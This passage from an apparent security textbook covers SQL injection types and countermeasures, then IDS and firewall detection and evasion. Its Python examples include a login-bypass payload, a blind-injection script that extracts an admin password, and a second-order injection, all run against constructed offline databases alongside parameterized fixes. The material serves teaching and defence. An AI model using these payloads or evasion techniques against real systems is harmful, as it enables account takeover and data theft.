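    return db.execute(sql).fetchone()[0] > 0


def whoami_vulnerable(db, username, password):
    """Many logins take the first matching row as the session user.  With the
    tautology every row matches and the attacker becomes the first account,
    here the administrator."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterized query: the SQL text is fixed and the values are bound
    separately, so blah' or 1=1-- is compared literally as a username."""
    sql = "SELECT Count(*) FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def probe_single_quote(db, field_value="'"):
    """Step 2 of the test procedure: a lone quote in the input breaks the
    vulnerable query's syntax.  Returns the database error text, or None when
    the query is well-formed (as it always is for the parameterized version)."""
    try:
        login_vulnerable(db, field_value, "x")
    except sqlite3.Error as err:
        return str(err)
    return None


def demo():
    db = make_db()
    payload = "blah' or 1=1--"
    return {
        "vulnerable_bypass": login_vulnerable(db, payload, "anything"),
        "vulnerable_logged_in_as": whoami_vulnerable(db, payload, "anything"),
        "safe_rejects_payload": login_safe(db, payload, "anything"),
        "safe_accepts_real_user": login_safe(db, "bob", "hunter2"),
        "single_quote_error": probe_single_quote(db),
    }
```

The error text returned by the probe is exactly the signal step 2 looks for; on a production site it would normally be hidden behind a generic error page, which is the situation the blind techniques in 13.5 deal with.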
Web pages that accept parameters from the user and build a SQL query
from them are the targets.
[Figure: SQL injection illustration (source 90); image not reproduced]
13.5 Types of SQL Injection
There are a number of categorized SQL injection types that can be
executed with a web browser. They are:
Poorly Filtered Strings
o SQL injections based on poorly filtered strings are caused by user
input that is not filtered for escape characters. This means that a
user can input a value that is passed on as part of an SQL statement,
resulting in manipulation of the database by the end user.
Signature Evasion
o Many SQL injections will be blocked, to some extent, by intrusion
detection and intrusion prevention systems using signature detection
rules. Common programs that detect SQL injections are mod_security for
Apache and Snort. These programs aren't foolproof and, as such, the
signatures can be evaded, for example with alternative encodings,
comments inside keywords, or case changes that the signature does not
normalize.
Blind SQL Injection
o Most good production environments do not allow you to see output in
the form of error messages or extracted database fields whilst
conducting SQL injections; these injections are known as Blind SQL
Injections. They are divided into Partially Blind Injections and Totally
Blind Injections.
o Partially Blind Injections are injections where you can see slight
changes in the resulting page; for instance, an unsuccessful injection
may redirect the attacker to the main page, whereas a successful
injection will return a blank page. That one-bit difference is enough
to extract data, a character at a time, by injecting true/false
conditions.
o Totally Blind Injections are unlike Partially Blind Injections in
that they don't produce a difference in output of any kind. This is
still injectable, though it's harder to determine whether an injection
is actually taking place; the usual approach is time-based, making the
database delay its response (WAITFOR DELAY on SQL Server, SLEEP() on
MySQL) only when the injected condition is true.
[90] Figure source (image not reproduced): http://blog.itnet.vn/uploads/fckfinder/anhkha/images/bao-mat-website/sql-injection/hack%20is%20power%20sql%20injection.JPG
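A partially blind injection of the kind described above, as an added example that is not part of the original text: the target is a product search whose only observable is whether any results came back, and the attacker extracts the administrator's password one character at a time through that yes/no oracle. The SQLite database, the search page, the table names and the secret are constructed for the example; unicode() and substr() are SQLite's built-in functions, and other databases have equivalents (ASCII(), SUBSTRING()).

```python
"""Boolean-based blind SQL injection: extracting a value one character at a
time from an application that only shows "results" or "no results".  Added
example, not from the original text: the in-memory SQLite database, the search
page, the table names and the secret are constructed so it runs offline."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'c0rrect-h0rse')")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)", [("router",), ("switch",)])
    return db


class SearchPage:
    """Partially blind target: the search term is concatenated into the query,
    but the only thing the attacker can observe is whether any rows came back.
    No errors and no data are ever echoed."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def has_results(self, term):
        self.requests += 1
        sql = "SELECT id FROM products WHERE name LIKE '%" + term + "%'"
        return len(self.db.execute(sql).fetchall()) > 0


def extract(page, subquery, max_len=64):
    """Recover the value of `subquery` (a SQL expression, here the admin's
    password) through the yes/no oracle.  Each character's code point is found
    by binary search, so about 8 requests per character instead of up to 128."""
    value = ""
    for pos in range(1, max_len + 1):
        # Does the secret have a character at this position?  If not, we are done.
        if not page.has_results(f"' AND length(({subquery}))>={pos}--"):
            break
        lo, hi = 0, 127                       # assume 7-bit ASCII in the secret
        while lo < hi:
            mid = (lo + hi) // 2
            # LIKE '%' matches every product, so the page shows results exactly
            # when the injected comparison is true.
            if page.has_results(f"' AND unicode(substr(({subquery}),{pos},1))>{mid}--"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


def demo():
    page = SearchPage(make_db())
    secret = extract(page, "SELECT password FROM users WHERE username='admin'")
    return {"secret": secret, "requests": page.requests}
```

The same loop drives a totally blind injection when not even a yes/no difference is visible: the injected condition then triggers a deliberate delay only when it is true and the attacker measures response time instead of reading the page. SQLite has no sleep function, so that variant is not shown here; the parameterized query from 13.6 removes both variants because the injected text never becomes SQL.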
13.6 SQL Injection Countermeasures
[Figure: SQL injection countermeasures illustration (source 91); image not reproduced]
[91] http://dilanwarnakulasooriya.files.wordpress.com/2012/01/sql_inject.png
SQL Injection flaws are introduced when software developers create
dynamic database queries that include user supplied input. Avoiding SQL
injection flaws is simple. Developers need to either:
a) Stop writing dynamic queries; and/or
b) Prevent user supplied input which contains malicious SQL from
affecting the logic of the executed query.
Primary Defenses:
1: Use of Prepared Statements (Parameterized Queries)
Prepared statements ensure that an attacker is not able to change the
intent of a query, even if SQL commands are inserted by an attacker.
The query text with placeholders is sent to the database and compiled
first; the values are bound afterwards and can only ever be data. If an
attacker enters the userID tom' or '1'='1, a parameterized query is not
vulnerable and instead looks for a username which literally matches the
entire string tom' or '1'='1.
2: Use of Stored Procedures
The difference between prepared statements and stored procedures is
that the SQL code for a stored procedure is defined and stored in the
database itself, and then called from the application. Both of these
techniques have the same effectiveness in preventing SQL injection,
provided the stored procedure itself uses static SQL; a procedure that
builds a statement from its parameters with EXEC or sp_executesql is
just dynamic SQL moved into the database and is injectable in the same
way.
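The caveat on stored procedures above, together with the "injection into stored strings" mentioned in 13.1, as an added example that is not part of the original text. Python with an in-memory SQLite database stands in for the application and the procedure: registration binds its parameters correctly, and a later change-password routine reads the stored name back and concatenates it, which is the pattern of a procedure that builds its statement with EXEC from its inputs. The table, accounts and routine names are constructed for illustration.

```python
"""Second-order (stored) SQL injection and the dynamic-SQL pitfall: input that
was inserted safely through a parameter is later trusted and concatenated into
a query.  Added example, not from the original text: the in-memory SQLite
database, the accounts and the change-password routines are constructed for
illustration; the dynamic routine plays the role of a stored procedure that
builds its statement with EXEC from its parameters."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'c0rrect-h0rse')")
    return db


def register(db, username, password):
    """Registration uses a parameterized INSERT, so the hostile username is
    stored verbatim and is harmless at this point.  Returns the new row id."""
    cur = db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                     (username, password))
    return cur.lastrowid


def change_password_dynamic(db, user_id, new_password):
    """Later code reads the stored name back and trusts it because it came
    from the database, then builds the UPDATE by concatenation.  The quote and
    comment inside the stored name redirect the UPDATE to the admin's row."""
    name = db.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()[0]
    db.execute("UPDATE users SET password='" + new_password +
               "' WHERE username='" + name + "'")


def change_password_safe(db, user_id, new_password):
    """Keying the UPDATE on the numeric id and binding every value keeps the
    stored string as data, whatever it contains."""
    db.execute("UPDATE users SET password=? WHERE id=?", (new_password, user_id))


def password_of(db, user_id):
    return db.execute("SELECT password FROM users WHERE id=?", (user_id,)).fetchone()[0]


def demo():
    hostile_name = "admin'--"
    # Vulnerable path: the attacker registers, then "changes their own password".
    db1 = make_db()
    uid1 = register(db1, hostile_name, "x")
    change_password_dynamic(db1, uid1, "pwned")
    # Safe path: the same two actions against the parameterized routine.
    db2 = make_db()
    uid2 = register(db2, hostile_name, "x")
    change_password_safe(db2, uid2, "pwned")
    return {
        "admin_after_dynamic": password_of(db1, 1),    # attacker set admin's password
        "attacker_after_dynamic": password_of(db1, uid1),
        "admin_after_safe": password_of(db2, 1),
        "attacker_after_safe": password_of(db2, uid2),
    }
```

The lesson for reviews is that "this value came from the database" is not a reason to trust it; the only safe rule is that every value, whatever its origin, is bound as a parameter at the point where it meets SQL text.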
Additional Defenses:
Least Privilege
To minimize the potential damage of a successful SQL injection attack,
minimize the privileges assigned to every database account in your
environment. Do not assign DBA or admin type access rights to your
application accounts. Make sure that accounts that only need read
access are only granted read access to the tables they need access to.
If an account only needs access to portions of a table, consider
creating a view that limits access to that portion of the data and
assigning the account access to the view instead, rather than the
underlying table. Rarely, if ever, grant create or delete access to
database accounts.
SQL injection is not the only threat to your database data. Attackers
can simply change the parameter values from one of the legal values
they are presented with to a value that is unauthorized for them, but
which the application itself is authorized to access. As such,
minimizing the privileges granted to your application will reduce the
likelihood of such unauthorized access attempts succeeding, even when an
attacker is not trying to use SQL injection as part of their exploit. [92]
[92] http://www.owasp.org/index.php/SQL_Injection_Prevention
CHAPTER 14
Evading IDS, Firewalls and Detecting Honeypots
Objective
14.1 Intrusion Detection Systems (IDS)
14.2 Types of IDS
14.3 Firewall
14.4 Types of Firewall
14.5 Firewall Identification techniques
14.6 Honeypot
14.7 How to set up a Honeypot?
14.1 Intrusion Detection Systems (IDS)
[Figure: intrusion detection system overview (source 93); image not reproduced]
[93] http://ids.nic.in/intrusiondetectionsystem.JPG
An intrusion detection system (IDS) inspects inbound and outbound
network activity and identifies suspicious patterns that may indicate a
network or system attack from someone attempting to break into or
compromise a system.
A network IDS is built on a packet sniffer: it intercepts packets
travelling along the communication media and protocols it monitors,
usually TCP/IP. Unlike a plain sniffer, it then analyzes what it
captured against rules or a baseline and raises alerts; by itself it
does not block anything, which is what distinguishes an IDS from an
intrusion prevention system (IPS).
14.2 Types of IDS
IDS come in a variety of "flavors" and approach the goal of detecting
suspicious traffic in different ways. There are network based (NIDS) and
host based (HIDS) intrusion detection systems. There are IDS that detect
by looking for specific signatures of known threats, similar to the way
antivirus software typically detects and protects against malware, and
there are IDS that detect by comparing traffic patterns against a
baseline and looking for anomalies.
IDS are deployed in three main forms: network monitoring, host
monitoring, and log file monitoring.
NIDS
Network Intrusion Detection Systems are placed at a strategic point or
points within the network to monitor traffic to and from all devices on
the network. Ideally you would inspect all inbound and outbound
traffic; however, doing so might create a bottleneck that would impair
the overall speed of the network.
In a network-based intrusion-detection system (NIDS), the sensors are
located at choke points in the network to be monitored, often in the
demilitarized zone (DMZ) or at network borders. The sensor captures all
network traffic and analyzes the content of individual packets for
malicious traffic. A NIDS sees only what crosses its sensor, so traffic
that is encrypted end to end, or that never leaves a host, is invisible
to it.
HIDS
Host Intrusion Detection Systems run on individual hosts or devices on
the network. A HIDS monitors the inbound and outbound packets from the
device only, together with local activity such as logs and file changes,
and will alert the user or administrator if suspicious activity is
detected. [94]
How IDS Works?
To understand how an IDS works, we need to know the three main
components that make up the IDS: the sensor, the backend and the
frontend. Their functions are as follows:
(1) Sensor
The sensor works as a packet capture and activity capture engine. It
determines the presence of an event by comparing the events captured
with the events in the signature database. This technique is known as
pattern matching. The IDS looks for traffic and behavior that match the
patterns of known attacks in the signature database, so the database
must be kept up to date. The sensor focuses only on detection. In a
network-based IDS, the sensor taps into the network and listens to the
various communications within its reach. When the sensor finds an event
that matches an entry in the signature database, it reports the
detection to the backend.
(2) Backend
The backend plays the role of the alarm. It is the core of the IDS,
where it is determined how an event reported by a sensor is handled.
The backend collects all events detected by the sensors and keeps a
record of them in an event repository database. It then alerts the
users if any threatening events are found. The way the IDS responds can
be configured by its users; usually an alert takes the form of a log
entry, an email or a screen display. The backend also provides storage
for the IDS setup and configuration.
(3) Frontend
Since the backend collects the events captured by the sensors, the
frontend displays the events collected. It is the direct user interface
that allows the user to command and control the IDS. From the frontend,
the user can view the events detected by the sensors, set up and
configure the IDS and update the signature database. [95]
[94] http://netsecurity.about.com/cs/hackertools
Ways to Detect an Intrusion
Intrusion detection systems use the following detection techniques:
Statistical anomaly-based IDS- A statistical anomaly-based IDS establishes a performance baseline from evaluations of normal network traffic. It then compares samples of current network traffic activity to this baseline to determine whether they fall within the baseline parameters. If the sampled traffic falls outside the baseline parameters, an alarm is triggered.
Signature recognition- Network traffic is examined for preconfigured and predetermined attack patterns known as signatures. Many attacks today have distinct signatures. Good security practice requires that the collection of signatures be constantly updated to mitigate emerging threats.
Protocol anomaly detection- In this type of detection, models of the TCP/IP protocols are built from their specifications, and observed traffic is checked against these models.
95 http://yewchuan.wordpress.com
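The three components and the signature and statistical-anomaly techniques just described fit together as in the following toy IDS, an added example written for this section rather than code from the book; the captured traffic, the signature database and the baseline counts are all constructed.

```python
"""Toy IDS with the three components described above (sensor, backend,
frontend) plus a statistical anomaly detector. All data is constructed."""
from collections import Counter
from dataclasses import dataclass
from statistics import mean, pstdev

# Constructed captured traffic: (source IP, destination port, payload).
SAMPLE_TRAFFIC = [
    ("10.0.0.5", 80, b"GET /index.html HTTP/1.1"),
    ("10.0.0.7", 80, b"GET /images/logo.png HTTP/1.1"),
    ("10.0.0.5", 80, b"GET /../../etc/passwd HTTP/1.1"),
    ("10.0.0.9", 443, b"\x16\x03\x01\x00\x05"),
    ("10.0.0.5", 23, b"root\r\n"),
]
SIGNATURES = {"directory-traversal": b"../.."}  # constructed database as shipped


@dataclass
class Event:
    detector: str      # "signature" or "anomaly"
    src_ip: str
    dst_port: int
    detail: str


class Backend:
    """The alarm: keeps every reported event in the event repository and
    hands it to a user-configurable alert handler (log, e-mail, screen)."""
    def __init__(self, alert_handler=None):
        self.repository = []
        self.alert_handler = alert_handler or (lambda event: None)

    def report(self, event):
        self.repository.append(event)
        self.alert_handler(event)


class Sensor:
    """Capture engine: pattern-matches each payload against the signature
    database and reports hits to the backend. Detection only, no response."""
    def __init__(self, signatures, backend):
        self.signatures = dict(signatures)
        self.backend = backend

    def inspect(self, src_ip, dst_port, payload):
        for name, pattern in self.signatures.items():
            if pattern in payload:
                self.backend.report(Event("signature", src_ip, dst_port, name))


class StatisticalSensor:
    """Anomaly detector: learns a baseline of packets-per-source from normal
    traffic and alarms when a sampled count exceeds mean + k * stdev."""
    def __init__(self, backend, k=2.0):
        self.backend = backend
        self.k = k
        self.threshold = None

    def train(self, normal_counts):
        self.threshold = mean(normal_counts) + self.k * pstdev(normal_counts)

    def sample(self, counts):
        for src_ip, n in counts.items():
            if n > self.threshold:
                self.backend.report(Event(
                    "anomaly", src_ip, 0, f"{n} pkts > baseline {self.threshold:.1f}"))


class Frontend:
    """User interface: views the repository and pushes signature updates."""
    def __init__(self, backend):
        self.backend = backend

    def view(self):
        return [f"{e.detector}: {e.src_ip}:{e.dst_port} {e.detail}"
                for e in self.backend.repository]

    def update_signatures(self, sensor, new_signatures):
        sensor.signatures.update(new_signatures)


def run_demo():
    """Run both sensors over the constructed traffic; return the frontend view."""
    backend = Backend()
    sensor = Sensor(SIGNATURES, backend)
    frontend = Frontend(backend)
    for pkt in SAMPLE_TRAFFIC[:3]:
        sensor.inspect(*pkt)
    # A signature update pushed from the frontend; without it the Telnet root
    # login in the second batch would go unnoticed.
    frontend.update_signatures(sensor, {"telnet-root-login": b"root\r\n"})
    for pkt in SAMPLE_TRAFFIC[3:]:
        sensor.inspect(*pkt)
    anomaly = StatisticalSensor(backend, k=2.0)
    anomaly.train([3, 4, 3, 5, 4])            # constructed normal per-source counts
    burst = Counter(src for src, _, _ in SAMPLE_TRAFFIC)
    burst["198.51.100.4"] = 40                 # constructed flood from one source
    anomaly.sample(burst)
    return frontend.view()
```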
An IDS works by examining the following events:
Observing Activity: The intrusion detection system observes activity taking place within the network and keeps track of user policies and activity patterns to ensure there are no attempts to violate them.
Viruses: Viruses and malware can hide within a networked system in the form of spyware, keyloggers, password-theft tools and other types of malicious code. A good intrusion detection system can spot where they are hiding and then take the necessary steps to remove these hidden files.
Vulnerabilities: When a networked system is configured, vulnerabilities can be created in the system configuration files. The intrusion detection system identifies the vulnerabilities in the configuration files as well as on each machine on the network.
File Settings: Authorization files on a network generally consist of user authorizations and group authorizations. The intrusion detection system checks these on a regular basis to ensure they have not been tampered with in any way.
Services: Service configuration files are routinely checked to ensure that there are no unauthorized services in operation on the network.
Packet Sniffing: Intrusion detection systems check for unauthorized network monitoring programs that may have been installed for the purpose of monitoring and recording user account activity.
PC Check: The intrusion detection system checks each PC on the network periodically to make sure there have not been any violations or tampering. Generally, if one PC displays a violation, the system should check all of the other machines on the network.96
96 http://www.spamlaws.com
14.3 IDS Evasion Techniques
Intrusion detection system evasion techniques bypass detection by
creating different states on the IDS and on the targeted computer. The
adversary accomplishes this by manipulating either the attack itself or
the network traffic that contains the attack.
These evasive techniques include flooding, fragmentation, encryption,
and obfuscation.
Flooding- IDSs depend on resources such as memory and processor power to capture packets, analyze traffic and report malicious attacks effectively. By flooding a network with noise traffic, an attacker can cause the IDS to exhaust its resources examining harmless traffic. Meanwhile, while the IDS is distracted and occupied by the volume of noise traffic, the attacker can target the system with little or no intervention from the IDS.
A denial of service (DoS) attack is one that is intended to compromise the availability of a computing resource. Common DoS attacks include ping floods and mail bombs, both intended to consume disproportionate amounts of resources and starve legitimate processes. Other attacks target bugs in software and are intended to crash the system. The infamous "ping of death" and "teardrop" attacks are examples of these.
Denial of service attacks can be leveraged to subvert systems (thus compromising more than availability) as well as to disable them. When discussing the relevance of DoS attacks to a security system, the question of whether the system is "fail-open" arises. A "fail-open" system ceases to provide protection when it is disabled by a DoS attack. A "fail-closed" system, on the other hand, leaves the network protected when it is forcibly disabled.
The terms "fail-open" and "fail-closed" are most often heard in the context of firewalls, which are access-control devices for networks. A fail-open firewall stops controlling access to the network when it crashes, but leaves the network available. An attacker who can crash a fail-open firewall can bypass it entirely. Good firewalls are designed to "fail closed", leaving the network completely inaccessible (and thus protected) if they crash.
Network IDSs are passive. They do not control the network or maintain its connectivity in any way. As such, a network IDS is inherently fail-open. If an attacker can crash the IDS or starve it of resources, she can attack the rest of the network as if the IDS weren't even there. Because of the obvious susceptibility of network IDSs to DoS attacks, it is important that they be fortified against them.
Unfortunately, denial of service attacks are extremely difficult to defend against. The resource starvation problem is not easily solved, and there are many different points at which the resources of an IDS can be consumed. Attacks that crash the IDS itself are easily fixed once found, but finding all such vulnerabilities is not easily done.
Fragmentation- Because different network media allow different maximum transmission units (MTUs), transmissions must be allowed to fragment into differently sized packets or cells. Attackers can take advantage of this by dividing attack packets into smaller and smaller portions that evade the IDS but carry out the attack when reassembled by the target host.
Protocols like TCP allow any amount of data (within the limits of the IP protocol's maximum packet size) to be contained in each discrete packet. A collection of data can be transmitted in one packet or in a group of them. Because packets can arrive at their destination out of order, even when transmitted in order, each packet is given a number that indicates its place within the intended order of the stream. This is commonly referred to as a "sequence number", and collections of packets marked with sequence numbers are called "sequenced".97
Encryption- Network-based intrusion detection relies on the analysis of traffic captured as it traverses the network from a source to its destination. If an attacker can establish an encrypted session with the target host using Secure Shell (SSH), Secure Sockets Layer (SSL) or a virtual private network (VPN) tunnel, the IDS cannot analyze the packets and the malicious traffic is allowed to pass. Obviously, this technique requires that the attacker be able to establish a secure encrypted session with the target host.
Obfuscation- Obfuscation, an increasingly popular evasive technique, involves concealing an attack with special characters. It can use control characters such as space, tab, backspace and Delete. The technique may also represent characters in hex format to elude the IDS. Using Unicode representation, where each character has a unique value regardless of platform, program or language, is also an effective way to evade IDSs.98
Polymorphic code is another means of circumventing a signature-based IDS: by generating a unique attack pattern each time, the attack has no single detectable signature.
97 http://insecure.org/stf/secnet_ids/secnet_ids.html
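As a defensive counterpart to the fragmentation and obfuscation techniques described above, the following added example (not code from the book) shows why an IDS must reassemble the stream and normalize encodings before signature matching; the signature database, the sample request and the way it is fragmented are constructed.

```python
"""Inspection that survives fragmentation and encoding-based obfuscation:
reassemble the stream, then normalize encodings, then match signatures.
Signatures and the sample request are constructed."""
import re
from urllib.parse import unquote

# Constructed signature database: name -> byte pattern.
SIGNATURES = {
    "directory-traversal": b"../",
    "sensitive-file-read": b"/etc/passwd",
}

# Constructed evasive request: traversal hidden behind %2e escapes and a
# hex-encoded 'w' in "passwd", delivered as out-of-order fragments.
FULL_REQUEST = b"GET /%2e%2e/%2e%2e/etc/pass%77d HTTP/1.1"


def sample_fragments():
    """(offset, data) pairs; the split at byte 9 cuts a %2e escape in half."""
    return [(24, FULL_REQUEST[24:]), (0, FULL_REQUEST[:9]), (9, FULL_REQUEST[9:24])]


def reassemble(fragments):
    """Rebuild the contiguous stream from (offset, data) fragments.

    Fragments are processed in offset order; bytes already seen are kept and
    overlapping later copies are ignored, so an overlap cannot rewrite data
    the IDS has already inspected. A gap means the stream is incomplete."""
    buf = bytearray()
    for offset, data in sorted(fragments, key=lambda f: f[0]):
        if offset > len(buf):
            raise ValueError(f"gap before offset {offset}; stream incomplete")
        buf.extend(data[len(buf) - offset:])
    return bytes(buf)


def normalize(payload):
    """Undo the encodings used to hide a pattern from a byte-level signature:
    %uXXXX Unicode escapes, percent-encoding (repeated, to catch double
    encoding), backslash separators, "/./" and "//" path noise, runs of
    whitespace, and letter case."""
    text = payload.decode("latin-1")          # lossless bytes -> str
    text = re.sub(r"%u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), text)
    for _ in range(3):                         # bounded: stop when stable
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.replace("\\", "/")
    text = re.sub(r"/(\./)+|//+", "/", text)
    text = re.sub(r"\s+", " ", text)
    return text.lower().encode("latin-1", "replace")


def match(payload):
    """Signature matcher: sorted names of the patterns present."""
    return sorted(name for name, pat in SIGNATURES.items() if pat in payload)


def match_each_fragment(fragments):
    """What a sensor sees if it inspects fragments one at a time."""
    hits = set()
    for _, data in fragments:
        hits.update(match(data))
    return sorted(hits)


def inspect_stream(fragments, normalize_first=True):
    """Reassemble, optionally normalize, then match."""
    stream = reassemble(fragments)
    return match(normalize(stream) if normalize_first else stream)


if __name__ == "__main__":
    frags = sample_fragments()
    print("per-fragment:", match_each_fragment(frags))
    print("reassembled, raw:", inspect_stream(frags, normalize_first=False))
    print("reassembled + normalized:", inspect_stream(frags))
```

Only the last line of the demo reports a hit: per-fragment inspection and inspection of the raw reassembled bytes both see nothing.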
14.4 Firewall
Access to e-mail and other Internet resources is very much a necessity for conducting business and accessing information. However, along with the convenience that network connectivity brings, it also raises serious security concerns. With always-on connections such as cable modems and DSL lines, Internet users need to be increasingly alert to security issues, as network traffic coming into the computer can damage files and programs even when the user is away and the computer is idle. On a system that is not protected by any security measures, malicious code such as viruses can infect the system and cause damage that may be difficult to repair. Unscrupulous characters on the Internet are always snooping around trying to find open computers from which they can steal personal files and personal information or create other forms of mischief. The loss of financial records, e-mail or customer files can be devastating to a business or to an individual.
What are Firewalls?
Firewalls are tools that can be used to enhance the security of computers connected to a network, such as a LAN or the Internet. A firewall separates a computer from the Internet, inspecting packets of data as they arrive at either side of the firewall (inbound to, or outbound from, your computer) to determine whether each should be allowed to pass or be blocked.
Firewalls act as guards at the computer's entry points (called ports), where the computer exchanges data with other devices on the network. Firewalls ensure that packets requesting permission to enter the computer meet certain rules established by the user of the computer. Firewalls operate in two ways: by either denying or accepting all messages based on a list of designated acceptable or unacceptable sources, or by allowing or denying all messages based on a list of designated acceptable or unacceptable destination ports.
98 http://johncrackernet.blogspot.in/2007/01/intrusion-detection-system-ids-evasion.
Personal computers use TCP/IP ports to communicate with other computers. A port is a point at which a computer connects to networks and to other computers so that it can exchange information with them. Personal computers have various types of ports, each of which provides a specific and unique service. The port numbers that are open indicate which applications or services the computer is currently running.
Each port has a specific number, and each one allows computers to
exchange information related to a specific application. For instance,
computers typically exchange information with the World Wide Web via
port 80. The port number is held in the information in the packet header.
This is important for firewalls, because by reading the packet the firewall
can tell what application the message is trying to run. Firewalls can be
configured to deny certain applications, which they determine by reading
the port number of the incoming packet.
For example, one common service is FTP, or file transfer protocol, which
allows computers to exchange large files of text and graphics. The FTP
server on a computer utilizes port 21. If the recipient computer is open to
accepting FTP packets, it will accept packets that indicate that they are
FTP packets by the inclusion of port 21 in their header. If, for instance,
the recipient computer is not running FTP, it would not be open to
receiving information that is addressed for port 21. Thus the firewall
should be configured to deny access to any packets that are destined for
that port number.
There are 65,535 virtual ports on a typical personal computer that can
be used to gain entry. The firewall has to keep an eye on each one of
these ports.
Classification of Firewalls
Firewalls have a set of rules that determines if the packet should be
allowed entry. The firewall is located at the point of entry where data
attempts to enter the computer from the Internet. But different firewalls
have different methods of inspecting packets for acceptance or rejection.
Packet Filtering
The most common firewall method is known as packet filtering. When a packet-filter firewall receives a packet from the Internet, it checks the addressing information held in the header of the packet against a table of access control rules to determine whether or not the packet is acceptable.
In this case, a set of rules established by the firewall administrator serves as the guest list. These rules may specify certain actions when a particular source or destination IP address or port number is identified. For example, access to a pornographic web site can be blocked by designating the IP address of that site as a non-permitted connection (incoming or outgoing) with the user's computer. When the packet-filter firewall encounters a packet from that site, it examines the packet. Since the IP address of the site is contained in the header of the packet, it meets the condition that specifically denies such a connection, and the web traffic is not permitted to go through.
Although packet filters are fast, they are also relatively easy to
circumvent. One method of getting around a packet filter firewall is
known as IP spoofing, in which hackers adopt the IP address of a trusted
source, thereby fooling the firewall into thinking that the packets from
the hacker are actually from a trusted source. The second fundamental
problem with packet filter firewalls is that they allow a direct connection
between source and destination computers. As a result, once an initial
connection has been approved by the firewall, the source computer is
connected directly to the destination computer, thereby potentially
exposing the destination computer and all the computers to which it is
connected to attack.
Stateful Packet Inspection
A second method used by firewalls is known as stateful packet inspection. Stateful packet inspection is a form of super-charged packet filtering. It examines not just the headers of the packet but also its contents, to determine more about the packet than just its source and destination information. It is called stateful packet inspection because it examines the contents of the packet to determine what the state of the communication is. It ensures that the stated destination computer has previously requested the current communication. This is a way of ensuring that all communications are initiated by the recipient computer and take place only with sources that are known and trusted from previous interactions. In addition to being more rigorous in their inspection of packets, stateful inspection firewalls also close off ports until a connection to the specific port is requested. This adds a layer of protection against the threat of port scanning.
Application-Level Proxy
An application-level proxy is so named because it determines whether a connection to a requested application is permitted. Only connections for specified purposes, such as Internet access or e-mail, are permitted. This allows system administrators to control what applications the computers on their systems will be used for.
For example, hackers can use the Telnet service (which in the early days of the Internet was developed to allow remote logins to computers) to gain unauthorized access to a network. However, a firewall can be set up to allow only web and e-mail applications to gain access. The firewall can be programmed to stop all packets with the destination port of 23, which is the standard port for Telnet. Any attempt by hackers to telnet into the user's computer will fail because the application-level firewall recognizes this Telnet connection as a non-web/e-mail application and rejects the information trying to enter the user's computer.
This type of firewall is known as an application-level proxy because, in addition to screening packets for the type of application they want to run on the user's computer, it also serves as a proxy server. A proxy can be thought of as a computer that sits between a computer and a web server and acts as a middleman between the two.
An application-level proxy receives all communication requests from the computers behind it. It then proxies the request; that is, it makes the request on behalf of its constituent computers. What this does is effectively hide the individual computers on the network behind the firewall. The targeted computers are protected from view because outside sources never make direct contact with them: every communication is conducted through the proxy server.
Network Address Translation (NAT)
Network Address Translation (NAT) serves as a firewall by keeping individual IP addresses hidden from the outside world. Similar to a proxy server, Network Address Translation acts as an intermediary between a group of computers and the Internet. NAT allows an organization to present itself to the Internet with one address. NAT converts the address of each computer and device on a LAN into one IP address for the Internet and vice versa. As a result, people scanning the Internet for addresses cannot identify the computers on the network or capture any details of their location, IP address, etc. And if the bad guys can't find you, they can't hurt you.
Firewall Identification Techniques:
1. Port Scanning: The scanning engine is composed of different modules that handle specific scanning tasks and are chained in an intelligent way in order to avoid performing any meaningless vulnerability checks. It only performs vulnerability detection based on services that were discovered and properly identified.
The scanning engine performs scans in a very dynamic manner to optimize speed and performance. The second test is to check whether the host is behind any firewalling/filtering device. This test enables the scanner to gather more information about the network infrastructure and helps during the scan of TCP and UDP ports. The kind of response received indicates whether the port is in use and can therefore be probed further for weaknesses. Some firewalls uniquely identify themselves under simple port scans. For example, Check Point's Firewall-1 listens on TCP ports 256, 257, 258 and 259, and Microsoft Proxy Server usually listens on TCP ports 1080 and 1745.
2. Firewalking: The firewalking methodology is based on determining what traffic types are allowed and then using those packet types as the basis for further traceroute-type scanning. A common firewall implementation might be to allow only DNS queries (UDP port 53). Thus, if we can send traffic to UDP port 53 with the next TTL value, it will pass through the initial firewall and return information about the next host in line.99
Firewalking is thus a technique for testing the vulnerability of a firewall and mapping the routers of the network that lie behind it.
3. Banner Grabbing: Banner grabbing is a form of enumeration that obtains banner information transmitted by services such as Telnet and FTP. It is a simple method of OS detection that helps in detecting services run by firewalls.100
14.5 Firewall Evasion techniques
Whether gathering information or launching an attack, it is generally
expected that the attacker avoids detection. Although some IP address
and port scans are blatant and easily detectable, wilier attackers use a
variety of means to conceal their activity. Techniques such as using FIN
scans instead of SYN scans—which attackers know most firewalls and
intrusion detection programs detect—indicate an evolution of
reconnaissance and exploit techniques to evade detection and
successfully accomplish their tasks.
i. FIN Scan: A FIN scan sends TCP segments with the FIN flag set in an attempt to provoke a response (a TCP segment with the RST flag set) and thereby discover an active host or an active port on a host. Attackers might use this approach rather than perform an address sweep with ICMP echo requests or an address scan with SYN segments because they know that many firewalls typically guard against the latter two approaches, but not necessarily against FIN segments. The use of TCP segments with the FIN flag set might evade detection and thereby help the attackers succeed in their reconnaissance efforts.
99 http://www.giac.org/paper/gsec/312/firewalk-attackers-firewall/100588
100 http://books.google.co.in/books?id=m2qZNW4dcyIC&pg=PA455&lpg=PA455&dq
